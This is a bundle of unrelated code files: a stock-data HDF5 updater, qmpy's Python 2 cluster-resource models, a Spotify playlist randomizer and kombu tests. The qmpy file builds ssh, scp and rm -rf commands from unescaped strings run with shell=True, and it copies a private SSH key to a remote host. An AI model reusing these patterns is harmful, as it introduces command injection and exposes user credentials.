self.store['profit_data_'+str(year)+'_'+str(index)] = data2
self.store['operation_data_'+str(year)+'_'+str(index)] = data3
self.store['growth_data_'+str(year)+'_'+str(index)] = data4
self.store['debtpaying_data_'+str(year)+'_'+str(index)] = data5
self.store['cashflow_data_'+str(year)+'_'+str(index)] = data6
except:
print("xxxx")
def __update_hs300_sharelist(self):
print("更新hs300数据")
data = ts.get_hs300s()
if not isinstance(data,pd.DataFrame):
data = pd.DataFrame()
self.store['hs300_share_list'] = data
"""
获取codes列表指明的股票数据
"""
def __update_share_history_data_by_codes(self,codes):
for code in codes:
self.updateAllShareHistoryDataCount += 1
self.update_share_history_data(code)
self.__log("finish "+str(self.updateAllShareHistoryDataCount)+"/"+str(self.updateAllShareHistoryDataSum))
def __update_share_list_from_internet(self):
self.__log("updata share list form internet")
data = ts.get_stock_basics()
self.store['all_share_list'] = data
def __formtInputCode(self,code):
codestr = str(code)
dlen = 6-len(codestr)
while(dlen > 0):
codestr = '0'+codestr
dlen -= 1
return codestr
def __log(self,str):
print("DataBase:"+str)
def __init__(self):
self.__log("---init---")
self.store = pd.HDFStore("hdf_store.hd5")
self.__log('---init end---')
#print(self.store)
def __del__(self):
self.__log("---del---")
if self.store.is_open:
self.__log("close store")
self.store.close()
if __name__ == "__main__":
dataBase = DataBase()
dataBase.update_all_report_data()
#dataBase.update_all()
#print(dataBase.get_hs300_sharelist())
#dataBase._makeLocalShareDataPath(100)
#data = dataBase.get_share_history_data(300024,'2017-07-03','2017-06-03')
#dataBase.update_all_share_history_data()
#data = ts.get_hist_data('399300')
#print(data)
#print(dataBase.get_hs300_info())
|
resources.py
|
from datetime import datetime, timedelta
import time
import random
import subprocess
import os
import os.path
import time
from collections import defaultdict
import json
import logging
import numbers
import yaml
from django.db import models
from django.contrib.auth.models import AbstractUser
import pexpect, getpass
import qmpy
from qmpy.db.custom import DictField
import queue as queue
import threading
logger = logging.getLogger(__name__)
def is_yes(string):
char = string.lower()[0]
if char == 'n':
return False
if char == 'y':
return True
return None
class AllocationError(Exception):
"""Problem with the allocation"""
class SubmissionError(Exception):
"""Failed to submit a job"""
class User(AbstractUser):
"""
User model - stores an oqmd users information.
Relationships:
| :mod:`~qmpy.Account` via account_set
| :mod:`~qmpy.Allocation` via allocation_set
| :mod:`~qmpy.Project` via project_set
Attributes:
| id
| username
| first_name
| last_name
| date_joined
| is_active
| is_staff
| is_superuser
| last_login
| email
"""
class Meta:
app_label = 'qmpy'
db_table = 'users'
@property
def running(self):
return queue.Job.objects.filter(account__user=self, state=1)
@classmethod
def get(cls, name):
try:
return cls.objects.get(username=name)
except cls.DoesNotExist:
return cls(username=name)
@staticmethod
def create():
username = raw_input("Username: ")
email = raw_input("E-mail address: ")
user, new = User.objects.get_or_create(username=username)
if not new:
print 'User by that name exists!'
print 'Please try a new name, or exit with Ctrl-x'
return User.create()
print 'Okay, user created!'
user.save()
user.create_accounts()
#user.assign_allocations()
return user
def create_accounts(self):
msg = 'Would you like to create cluster accounts for this user?'
ans = is_yes(raw_input(msg+' [y/n]: '))
if ans is False:
return
elif ans is None:
print "I didn't understand that command."
return self.create_accounts()
msg = 'Does user %s have an account on %s? [y/n]: '
msg2 = 'What is %s\'s username on %s?: '
msg3 = 'On %s@%s where should calculations be run? (absolute path): '
known = self.account_set.values_list('host__name', flat=True)
for host in Host.objects.exclude(name__in=known):
ans = raw_input(msg % (self.username, host.name))
ans = is_yes(ans)
if ans is False:
continue
uname = raw_input(msg2 % (self.username, host.name))
acct, new = Account.objects.get_or_create(user=self, host=host)
if not new:
print 'Account exists!'
continue
path = raw_input(msg3 % (self.username, host.name))
acct.run_path = path
acct.username = uname.strip()
acct.save()
acct.create_passwordless_ssh()
class Host(models.Model):
"""
Host model - stores all host information for a cluster.
Relationships:
| account
| allocation
Attributes:
| name: Primary key.
| binaries: dict of label:path pairs for vasp binaries.
| check_queue: Path to showq command
| checked_time: datetime object for the last time the queue was
| checked.
| hostname: Full host name.
| ip_address: Full ip address.
| nodes: Total number of nodes.
| ppn: Number of processors per node.
| running: dict of PBS_ID:state pairs.
| sub_script: Path to qsub command
| sub_text: Path to queue file template.
| utilization: Number of active cores (based on showq).
| walltime: Maximum walltime on the machine.
| state: State code. 1=Up, 0=Full (auto-resets to 1 when jobs are
| collected), -1=Down.
"""
name = models.CharField(max_length=63, primary_key=True)
ip_address = models.IPAddressField(null=True)
hostname = models.CharField(max_length=255)
binaries = DictField()
ppn = models.IntegerField(default=8)
nodes = models.IntegerField(default=30)
walltime = models.IntegerField(default=3600*24)
sub_script = models.CharField(max_length=120)
sub_text = models.TextField(default='/usr/local/bin/qsub')
check_queue = models.CharField(max_length=180,
default='/usr/local/maui/bin/showq')
checked_time = models.DateTimeField(default=datetime.min)
running = DictField()
utilization = models.IntegerField(default=0)
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'hosts'
def __str__(self):
return self.name
@staticmethod
def create():
"""
Classmethod to create a Host model. Script will ask you questions about
the host to add, and will return the created Host.
"""
host = {}
host['name'] = raw_input('Hostname:')
if Host.objects.filter(name=host['name']).exists():
print 'Host by that name already exists!'
exit(-1)
host['ip_address'] = raw_input('IP Address:')
if Host.objects.filter(ip_address=host['ip_address']).exists():
print 'Host at that address already exists!'
exit(-1)
host['ppn'] = raw_input('Processors per node:')
host['nodes'] = raw_input('Max nodes to run on:')
host['sub_script'] = raw_input('Command to submit a script '
'(e.g. /usr/local/bin/qsub):')
host['check_queue'] = raw_input('Command for showq (e.g.'
'/usr/local/maui/bin/showq):')
host['sub_text'] = raw_input('Path to qfile template:')
h = Host(**host)
h.save()
@classmethod
def get(cls, name):
try:
return cls.objects.get(name=name)
except cls.DoesNotExist:
return cls(name=name)
@property
def accounts(self):
return list(self.account_set.all())
@property
def jobs(self):
jobs = []
for acct in self.accounts:
jobs += list(acct.job_set.filter(state=1))
return jobs
@property
def active(self):
if self.state < 1:
return False
elif self.utilization > 5*self.nodes*self.ppn:
return False
else:
return True
@property
def percent_utilization(self):
return 100. * float(self.utilization) / (self.nodes*self.ppn)
def get_utilization(self):
util = 0
for acct in self.account_set.all():
for job in acct.job_set.filter(state=1):
util += job.ncpus
self.utilization = util
return util
def get_project(self):
"""
Out of the active projects able to run on this host,
select one at random
Output:
Project, Active project able to run on this host
"""
proj = Project.objects.filter(allocations__host=self, state=1)
proj = proj.filter(task__state=0)
if proj.exists():
return random.choice(list(proj.distinct()))
def get_tasks(self, project=None):
tasks = queue.Task.objects.filter(state=0)
if project is None:
project = self.get_project()
if project is None:
return
tasks = tasks.filter(project_set=project)
tasks = tasks.filter(project_set__allocations__host=self)
tasks = tasks.filter(project_set__users__account__host=self)
return tasks.order_by('priority', 'id')
@property
def qfile(self):
return open(self.sub_text).read()
def get_binary(self, key):
return self.binaries[key]
def _try_login(self, timeout=5.0):
def _login():
self._tmp_acct = Allocation.get('b1004').get_account()
self._tmp_ssh = 'ssh {user}@{host} "{cmd}"'.format(
user=self._tmp_acct.user.username,
host=self._tmp_acct.host.ip_address,
cmd='whoami')
self._tmp_proc = subprocess.Popen(self._tmp_ssh, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = self._tmp_proc.communicate()
if stdout.strip() == self._tmp_acct.user.username:
print "quest is up"
self._tmp_thread = threading.Thread(target=_login)
self._tmp_thread.start()
self._tmp_thread.join(timeout)
if self._tmp_thread.is_alive():
print "unable login on quest"
self._tmp_proc.terminate()
self._tmp_thread.join()
return self._tmp_proc.returncode
def check_host(self):
"""Pings the host to see if it is online. Returns False if it is
offline."""
ret = subprocess.call("ping -c 1 -w 1 %s" % self.ip_address,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
self.state = 1
self.save()
write_resources()
return True
else:
"""Sometimes quest refuses to respond to ping requests. So, try
logging into it using an(y) account. Trying executing a command and
see if it is successful."""
if self.name == 'quest':
if self._try_login() == 0:
self.state = 1
self.save()
write_resources()
return True
self.state = -2
self.save()
return False
@property
def running_now(self):
if not self.state == 1:
return {}
if datetime.now() + timedelta(seconds=-60) > self.checked_time:
self.check_running()
return self.running
def check_running(self):
"""
Uses the hosts data and one of the associated accounts to check the PBS
queue on the Host. If it has been checked in the last 2 minutes, it
will return the previously returned result.
"""
self.checked_time = datetime.now()
if not self.state == 1:
self.running = {}
self.save()
return
account = random.choice(self.accounts)
raw_data = account.execute(self.check_queue)
running = {}
if not raw_data:
return
for line in raw_data.split('\n'):
if 'Active Jobs' in line:
continue
line = line.split()
if len(line) != 9:
continue
try:
# < Mohan
if 'Moab' in line[0]:
qid = int(line[0].strip().split('.')[1])
else:
qid = int(line[0])
running[qid] = {
'user':line[1],
'state':line[2],
'proc':int(line[3])}
# Mohan >
except:
pass
self.running = running
self.save()
def get_running(self):
if self.running is not None:
return self.running
else:
return {}
def activate(self):
"""
Allow jobs to be run on this system. Remember to save() to enact change
"""
self.state = 1
def deactivate(self):
"""
Prevent new jobs from being started on this system.
Remember to save() changes
"""
self.state = -1
@property
def utilization_by_project(self):
utilization = defaultdict(int)
for job in self.jobs:
projects = job.task.project_set.all()
for p in projects:
utilization[str(p.name)] += float(job.ncpus)/len(projects)
if self.ppn*self.nodes > sum(utilization.values()):
utilization["Idle"] = self.ppn*self.nodes - sum(utilization.values())
return utilization
@property
def utilization_json(self):
series = []
for k, v in self.utilization_by_project.items():
series.append({'data':v, 'label':k})
return json.dumps(series)
@property
def ncpus(self):
return self.ppn * self.nodes
#===============================================================================#
class Account(models.Model):
"""
Base class for a `User` account on a `Host`.
Attributes:
| host
| id
| job
| run_path
| state
| user
| username
"""
user = models.ForeignKey(User)
host = models.ForeignKey(Host)
username = models.CharField(max_length=255)
run_path = models.TextField()
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'accounts'
def __str__(self):
return '{user}@{host}'.format(user=self.user.username,
host=self.host.name)
@classmethod
def get(cls, user, host):
try:
return Account.objects.get(user=user, host=host)
except cls.DoesNotExist:
return Account(host=host, user=user)
def create_passwordless_ssh(self, key='id_dsa', origin=None):
msg = 'password for {user}@{host}: '
if origin is None:
origin = '/home/{user}/.ssh'.format(user=getpass.getuser())
pas = getpass.getpass(msg.format(user=self.username, host=self.host.name))
msg = '/usr/bin/ssh {user}@{host} touch'
msg += ' /home/{user}/.ssh/authorized_keys'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
msg = '/usr/bin/scp {origin}/{key} {user}@{host}:/home/{user}/.ssh/'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
msg = '/usr/bin/ssh {user}@{host}'
msg += ' chmod 600 /home/{user}/.ssh/authorized_keys'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
msg = '/usr/bin/ssh-copy-id -i {origin}/{key} {user}@{host}'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
print 'Great! Lets test it real quick...'
out = self.execute('whoami')
if out == '%s\n' % self.username:
print 'Awesome! It worked!'
else:
print 'Something appears to be wrong, talk to Scott...'
@property
def active(self):
if self.state < 1:
return False
elif not self.host.active:
return False
else:
return True
def submit(self, path=None, run_path=None, qfile=None):
self.execute('mkdir %s' % run_path, ignore_output=True)
self.copy(folder=path, file='*', destination=run_path)
cmd = 'command cd {path} && {sub} {qfile}'.format(
path=run_path,
sub=self.host.sub_script,
qfile=qfile)
stdout = self.execute(cmd)
# < Mohan
tmp = stdout.strip().split()[0]
if 'Moab' in tmp:
jid = int(tmp.split('.')[1])
else:
jid = int(tmp.split('.')[0])
# Mohan >
return jid
def execute(self, command='exit 0', ignore_output=False):
ssh = 'ssh {user}@{host} "{cmd}"'.format(
user=self.username,
host=self.host.ip_address,
cmd=command)
logging.debug(ssh)
call = subprocess.Popen(ssh, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout,stderr = call.communicate()
logging.debug('stdout: %s', stdout)
logging.debug('stderr: %s', stderr)
if stderr and not ignore_output:
logging.warn('WARNING: %s', stderr)
return stdout
def copy(self, destination=None, to=None, # where to send the stuff
fr=None, file=None, folder=None, # what to send
clear_dest_dir=False, move=False): # some conditions on sending it
if destination is None:
destination = self.run_path
if to is None:
to = self
if fr is None:
if to == 'local':
fr = self
else:
fr = 'local'
assert (isinstance(to, Account) or to == 'local')
assert (isinstance(fr, Account) or fr == 'local')
assert ( not (file is None and folder is None) )
send_dir = False
if file is None:
send_dir = True
elif folder is None:
folder = os.path.dirname(file)
file = os.path.basename(file)
if clear_dest_dir:
if to == 'local':
command = subprocess.Popen('rm -f %s/*' % destination,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = command.communicate()
else:
stdout, stderr = self.execute('rm -f %/*' % destination)
logging.debug('stdout: %s', stdout)
if fr == 'local':
scp = 'scp '
else:
scp = 'scp {user}@{host}:'.format(
user=fr.username, host=fr.host.ip_address)
if not file:
scp += '-r '
if send_dir:
scp += os.path.abspath(folder)
else:
scp += '{path}/{file}'.format(
path=os.path.abspath(folder), file=file)
if to == 'local':
scp += ' '+destination
else:
scp += ' {user}@{host}:{path}'.format(
user=to.username, host=to.host.ip_address,
path=os.path.abspath(destination))
logging.debug('copy command: %s', scp)
cmd = subprocess.Popen(scp,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = cmd.communicate()
logging.debug('stdout: %s', stdout)
logging.debug('stderr: %s', stderr)
if move:
if send_dir:
rmcmd = 'rm -rf {path}'.format(path=os.path.abspath(folder))
else:
rmcmd = 'rm -f {path}/{file}'.format(file=file,
path=os.path.abspath(folder))
logging.debug('wiping source: %s', rmcmd)
stdout = fr.execute(rmcmd)
logging.debug('output: %s', stdout)
#===============================================================================#
class Allocation(models.Model):
"""
Base class for an Allocation on a computing resources.
Attributes:
| host
| job
| key
| name
| project
| state
| users
"""
name = models.CharField(max_length=63, primary_key=True)
key = models.CharField(max_length=100, default='')
host = models.ForeignKey(Host)
users = models.ManyToManyField(User)
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'allocations'
def __str__(self):
return self.name
@classmethod
def create(self):
name = raw_input('Name your allocation:')
if Allocation.objects.filter(name=name).exists():
print 'Allocation by that name already exists!'
exit(-1)
host = raw_input('Which cluster is this allocation on?')
if not Host.objects.filter(name=host).exists():
print "This host doesn't exist!"
exit(-1)
host = Host.objects.get(name=host)
alloc = Allocation(name=name, host=host)
alloc.save()
print 'Now we will assign users to this allocation'
for acct in Account.objects.filter(host=host):
inc = raw_input('Can %s use this allocation? y/n [y]:' %
acct.user.username )
if inc == 'y' or inc == '':
alloc.users.add(acct.user)
print 'If this allocation requires a special password, enter',
key = raw_input('it now:')
alloc.key=key
alloc.save()
@classmethod
def get(cls, name):
try:
return cls.objects.get(name=name)
except cls.DoesNotExist:
return cls(name=name)
@property
def active(self):
if self.state < 1:
return False
elif not self.host.active:
return False
else:
return True
def get_user(self):
return random.choice(self.users.filter(state=1))
def get_account(self, users=None):
if users is None:
users = self.users.all()
user = random.choice(list(users))
return user.account_set.get(host=self.host)
@property
def percent_utilization(self):
return self.host.percent_utilization
#===============================================================================#
class Project(models.Model):
"""
Base class for a project within qmpy.
Attributes:
| allocations
| entry
| name
| priority
| state
| task
| users
"""
name = models.CharField(max_length=63, primary_key=True)
priority = models.IntegerField(default=0)
users = models.ManyToManyField(User)
allocations = models.ManyToManyField(Allocation)
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'projects'
def __str__(self):
return self.name
@classmethod
def get(cls, name):
if isinstance(name, cls):
return name
try:
return cls.objects.get(name=name)
except cls.DoesNotExist:
return cls(name=name)
@property
def completed(self):
return self.task_set.filter(state=2)
@property
def running(self):
return self.task_set.filter(state=1)
@property
def waiting(self):
return self.task_set.filter(state=0).order_by('priority')
@property
def failed(self):
return self.task_set.filter(state=-1)
@staticmethod
def create():
'''
Create a new project. Prompts user on std-in
for name, users, and allocations of this project.
'''
name = raw_input('Name your project: ')
if Project.objects.filter(name=name).exists():
print 'Project by that name already exists!'
exit(-1)
proj = Project(name=name)
proj.save()
proj.priority = raw_input('Project priority (1-100): ')
users = raw_input('List project users (e.g. sjk648 jsaal531 bwm291): ')
for u in users.split():
if not User.objects.filter(username=u).exists():
print 'User named', u, 'doesn\'t exist!'
else:
proj.users.add(User.objects.get(username=u))
alloc = raw_input('List project allocations (e.g. byrd victoria b1004): ')
for a in alloc.split():
if not Allocation.objects.filter(name=a).exists():
print 'Allocation named', a, 'doesn\'t exist!'
else:
proj.allocations.add(Allocation.objects.get(name=a))
@property
def active(self):
if self.state < 0:
return False
else:
if self.state != 1:
self.state = 1
self.save()
return True
def get_allocation(self):
available = [ a for a in self.allocations.all() if a.active ]
if available:
return random.choice(available)
else:
return []
# !vih
def write_resources():
current_loc = os.path.dirname(__file__)
######
# headers for various configuration files
######
hosts_header = """# host1:
# binaries:
# bin_name1: /path/to/bin1
# bin_name2: /path/to/bin2
# check_queue: /full/path/to/showq
# hostname: full.host.name
# ip_address: ###.###.##.###
# nodes: # of nodes on machine
# ppn: # of processors per node
# sub_script: /full/path/to/submission/command
# sub_text: filename for qfile to use a template.
# A file named "filename" must be in configuration/qfiles
# walltime: maximum walltime, in seconds
# host2: ...
"""
f_hosts = open(current_loc+'/../configuration/resources/hosts.yml', 'w')
f_hosts.write(hosts_header)
f_hosts.write('\n')
users_header = """# user1:
# hostname1:
# run_path:/where/to/run/on/host1
# username: usernameonhost1
# hostname2:
# run_path:/where/to/run/on/host2
# username: usernameonhost2
# user2:
# hostname1: ...
"""
f_users = open(current_loc+'/../configuration/resources/users.yml', 'w')
f_users.write(users_header)
f_users.write('\n')
allocations_header = """# allocation1:
# host: hostname
# key: key needed for identifying allocation
# users:
# - user1
# - user2
# allocation2: ...
"""
f_allocations = open(current_loc+'/../configuration/resources/allocations.yml', 'w')
f_allocations.write(allocations_header)
f_allocations.write('\n')
projects_header = """# project1:
# allocations:
# - allocation1
# - allocation2
# priority: Base priority for the project. Lower numbers will be done soonest.
# users:
# - user1
# - user2
# project2: ...
"""
f_projects = open(current_loc+'/../configuration/resources/projects.yml', 'w')
f_projects.write(projects_header)
f_projects.write('\n')
######
# list of values that need to be written into the configuration files
######
host_values = ['binaries', 'check_queue', 'hostname', 'ip_address', \
'nodes', 'ppn', 'sub_script', 'sub_text', 'walltime']
user_values = ['run_path', 'username']
allocation_values = ['host', 'key', 'users']
project_values = ['allocations', 'priority', 'users']
######
# a function to 'clean' the values from type unicode/ long/ etc. to string/ int
######
def clean(val):
if isinstance(val, unicode):
val = str(val)
elif isinstance(val, numbers.Number):
val = int(val)
return val
######
# write host configurations into hosts.yml
######
hosts = Host.objects.all()
dict1 = {}
for h in hosts:
dict2 = {}
for hv in host_values:
dict2[hv] = clean(h.__getattribute__(hv))
dict1[clean(h.name)] = dict2
yaml.dump(dict1, f_hosts, default_flow_style=False)
######
# write user configurations into users.yml
######
users = User.objects.all()
dict1 = {}
for u in users:
dict2 = {}
accounts = Account.objects.filter(user=u)
for a in accounts:
dict2[clean(a.host.name)] = {'run_path':clean(a.run_path), \
'username':clean(a.username)}
dict1[clean(u.username)] = dict2
yaml.dump(dict1, f_users, default_flow_style=False)
######
# write allocation configurations into allocations.yml
######
alloc = Allocation.objects.all()
dict1 = {}
for a in alloc:
dict2 = {}
dict2['host'] = clean(a.host.name)
dict2['key'] = clean(a.key)
dict2['users'] = [ clean(u) for u in a.users.all().values_list('username', flat=True) ]
dict1[clean(a.name)] = dict2
yaml.dump(dict1, f_allocations, default_flow_style=False)
######
# write project configurations into projects.yml
######
pro = Project.objects.all()
dict1 = {}
for p in pro:
dict2 = {}
dict2['allocations'] = [ clean(a) for a in p.allocations.all().values_list('name', flat=True) ]
dict2['priority'] = clean(p.priority)
dict2['users'] = [ clean(u) for u in p.users.all().values_list('username', flat=True) ]
dict1[clean(p.name)] = dict2
yaml.dump(dict1, f_projects, default_flow_style=False)
|
randomizer.py
|
import spotipy
import os
import spotipy.util as util
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
import requests
os.environ["SPOTIPY_CLIENT_ID"] = ""
os.environ["SPOTIPY_CLIENT_SECRET"] = ""
os.environ["USER"] = ""
SERVER_PORT = 14523
os.environ["SPOTIPY_REDIRECT_URI"] = "http://localhost:{}".format(SERVER_PORT)
scope = 'user-library-read playlist-read-private playlist-read-collaborative playlist-modify-private playlist-modify-public user-follow-read'
class FailedAuth(BaseException):
"""Failed authentication for spotify"""
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class NotFound(BaseException):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class MyHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<html><body><h1 style="text-align:center">Great! Now go back to the python program and insert the URL of this page:</h1><button onclick="copy()" style="margin: 0 auto;display:block">Copy to clipboard</button><textarea id="textarea" style="display: block; margin: 0 auto; width: 60%"></textarea><script>var txt = document.getElementById("textarea"); txt.value = window.location.href;txt.select();function copy() {txt.select();document.execCommand("copy");}</script></body></html>'.encode('utf-8'))
def log_message(self, format, *args):
return
class StoppableSilentHTTPServer(HTTPServer):
stopped = False
def __init__(self, *args, **kw):
HTTPServer.__init__(self, *args, **kw)
def serve_forever(self):
while not self.stopped:
self.handle_request()
def force_stop(self):
self.stopped = True
# Ensure a last run of the thread so it can exit
requests.get(url='http://localhost:14523')
self.server_close()
class SpotifyAuth:
def __init__(self, username):
self._username = username
self._sp = None
self.httpd = None
def wait_for_auth(self):
self.httpd = StoppableSilentHTTPServer(('', SERVER_PORT), MyHTTPHandler)
Thread(target=self.httpd.serve_forever).start()
token = util.prompt_for_user_token(self._username, scope)
if token:
self._sp = spotipy.Spotify(auth=token)
else:
raise FailedAuth
def get_spotify(self):
return self._sp
def stop_server(self):
self.httpd.force_stop()
def __list_add_tracks__(list_object, tracks):
for item in tracks["items"]:
track = item["track"]
if track["id"] is not None:
list_object.append(track["id"])
return list_object
def __list_add_artist_tracks__(list_object, tracks):
for track in tracks:
if track["id"] is not None:
list_object.append(track["id"])
return list_object
def __add_playlist__(playlist_list, playlists):
for item in playlists["items"]:
playlist_list.append(item)
return playlist_list
def __add_artist__(artist_list, artists):
for item in artists["items"]:
artist_list.append(item)
return artist_list
def __chunk_list__(data, size):
return [data[x:x + size] for x in range(0, len(data), size)]
class SpotifyArtistRandomizer:
""""Randomizes a playlist in spotify"""
def __init__(self, username, sp):
self._username = username
self._sp = sp
self._playlist = None
self._artist = None
self._random_playlist_name = "{} (Randomized)"
def set_playlist_by_name(self, name):
self._playlist = self.__find_playlist__(name)
if self._playlist is None:
raise NotFound("No playlist found")
def __find_playlist__(self, name):
playlists = self.get_all_playlists()
for item in playlists:
if item["name"] == name:
return item
return None
def get_playlist_tracks(self, playlist=None):
if playlist is None:
playlist = self._playlist
track_list = []
result = self._sp.user_playlist(self._username, playlist["id"], fields="tracks,next")
tracks = result["tracks"]
track_list = __list_add_tracks__(track_list, tracks)
while tracks["next"]:
tracks = self._sp.next(tracks)
track_list = __list_add_tracks__(track_list, tracks)
return track_list
def get_artist_tracks(self, artist):
track_list = []
result = self._sp.artist_top_tracks(artist["uri"], country='US')
tracks = result["tracks"]
track_list = __list_add_artist_tracks__(track_list, tracks)
return track_list
def __remove_all_tracks__(self, playlist=None):
if playlist is None and self._playlist is not None:
playlist = self._playlist
elif self._playlist is None:
return
tracks = self.get_playlist_tracks(playlist)
for chunk in __chunk_list__(tracks, 20):
self._sp.user_playlist_remove_all_occurrences_of_tracks(self._username, playlist["id"], chunk)
def __create_artist_playlist__(self):
name = "Top 10 Tracks of followed Artists"
self._playlist = self.__find_playlist__(name)
if self._playlist is None:
self._playlist = self._sp.user_playlist_create(self._username,
name,
False)
return
def get_playlist_size(self, playlist=None):
if playlist is not None:
return playlist["tracks"]["total"]
elif self._playlist is not None:
return self._playlist["tracks"]["total"]
def add_tracks_to_playlist(self, tracks, playlist=None):
if playlist is None and self._playlist is not None:
playlist = self._playlist
elif self._playlist is None:
return
for chunk in __chunk_list__(tracks, 20):
self._sp.user_playlist_add_tracks(self._username, playlist["id"], chunk)
def top10_artist_tracks_playlist(self):
self.__create_artist_playlist__()
if self.get_playlist_size() > 1:
self.__remove_all_tracks__()
track_list = []
artists = self.get_all_artists()
for artist in artists:
track_list += self.get_artist_tracks(artist)
self.add_tracks_to_playlist(track_list)
def get_all_playlists(self):
playlist_list = []
playlists = self._sp.user_playlists(self._username)
__add_playlist__(playlist_list, playlists)
while playlists["next"]:
playlists = self._sp.next(playlists)
__add_playlist__(playlist_list, playlists)
return playlist_list
def get_all_artists(self):
artist_list = []
artists = self._sp.current_user_followed_artists()["artists"]
__add_artist__(artist_list, artists)
while artists["next"]:
artists = self._sp.next(artists)["artists"]
__add_artist__(artist_list, artists)
return artist_list
|
test_common.py
|
from __future__ import annotations
import socket
from typing import TYPE_CHECKING
from unittest.mock import Mock, patch
import pytest
from amqp import RecoverableConnectionError
from kombu import common
from kombu.common import (PREFETCH_COUNT_MAX, Broadcast, QoS, collect_replies,
declaration_cached, generate_oid, ignore_errors,
maybe_declare, send_reply)
from t.mocks import ContextMock, MockPool
if TYPE_CHECKING:
from types import TracebackType
def test_generate_oid():
from uuid import NAMESPACE_OID
instance = Mock()
args = (1, 1001, 2001, id(instance))
ent = '%x-%x-%x-%x' % args
with patch('kombu.common.uuid3') as mock_uuid3, \
patch('kombu.common.uuid5') as mock_uuid5:
mock_uuid3.side_effect = ValueError
mock_uuid3.return_value = 'uuid3-6ba7b812-9dad-11d1-80b4'
mock_uuid5.return_value = 'uuid5-6ba7b812-9dad-11d1-80b4'
oid = generate_oid(1, 1001, 2001, instance)
mock_uuid5.assert_called_once_with(NAMESPACE_OID, ent)
assert oid == 'uuid5-6ba7b812-9dad-11d1-80b4'
def test_ignore_errors():
connection = Mock()
connection.channel_errors = (KeyError,)
connection.connection_errors = (KeyError,)
with ignore_errors(connection):
raise KeyError()
def raising():
raise KeyError()
ignore_errors(connection, raising)
connection.channel_errors = connection.connection_errors = ()
with pytest.raises(KeyError):
with ignore_errors(connection):
raise KeyError()
class test_declaration_cached:
def test_when_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['foo']
assert declaration_cached('foo', chan)
def test_when_not_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['bar']
assert not declaration_cached('foo', chan)
class test_Broadcast:
def test_arguments(self):
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast(name='test_Broadcast')
uuid_mock.assert_called_with()
assert q.name == 'bcast.test'
assert q.alias == 'test_Broadcast'
assert q.auto_delete
assert q.exchange.name == 'test_Broadcast'
assert q.exchange.type == 'fanout'
q = Broadcast('test_Broadcast', 'explicit_queue_name')
assert q.name == 'explicit_queue_name'
assert q.exchange.name == 'test_Broadcast'
q2 = q(Mock())
assert q2.name == q.name
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast('test_Broadcast',
'explicit_queue_name',
unique=True)
uuid_mock.assert_called_with()
assert q.name == 'explicit_queue_name.test'
q2 = q(Mock())
assert q2.name.split('.')[0] == q.name.split('.')[0]
class test_maybe_declare:
def _get_mock_channel(self):
# Given: A mock Channel with mock'd connection/client/entities
channel = Mock()
channel.connection.client.declared_entities = set()
return channel
def _get_mock_entity(self, is_bound=False, can_cache_declaration=True):
# Given: Unbound mock Entity (will bind to channel when bind called
entity = Mock()
entity.can_cache_declaration = can_cache_declaration
entity.is_bound = is_bound
def _bind_entity(channel):
entity.channel = channel
entity.is_bound = True
return entity
entity.bind = _bind_entity
return entity
def test_cacheable(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
entity.auto_delete = False
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Calling maybe_declare default
maybe_declare(entity, channel)
# Then: It called declare on the entity queue and added it to list
assert entity.declare.call_count == 1
assert hash(entity) in channel.connection.client.declared_entities
# When: Calling maybe_declare default (again)
maybe_declare(entity, channel)
# Then: we did not call declare again because its already in our list
assert entity.declare.call_count == 1
# When: Entity channel connection has gone away
entity.channel.connection = None
# Then: maybe_declare must raise a RecoverableConnectionError
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity)
def test_binds_entities(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# When: calling maybe_declare with default of no retry policy
maybe_declare(entity, channel)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_binds_entities_when_retry_policy(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# Given: A retry policy
sample_retry_policy = {
'interval_start': 0,
'interval_max': 1,
'max_retries': 3,
'interval_step': 0.2,
'errback': lambda x: "Called test errback retry policy",
}
# When: calling maybe_declare with retry enabled
maybe_declare(entity, channel, retry=True, **sample_retry_policy)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
